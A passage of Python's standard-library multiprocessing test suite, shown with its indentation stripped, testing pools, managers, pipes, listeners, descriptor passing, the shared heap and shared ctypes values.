# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((test.support.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
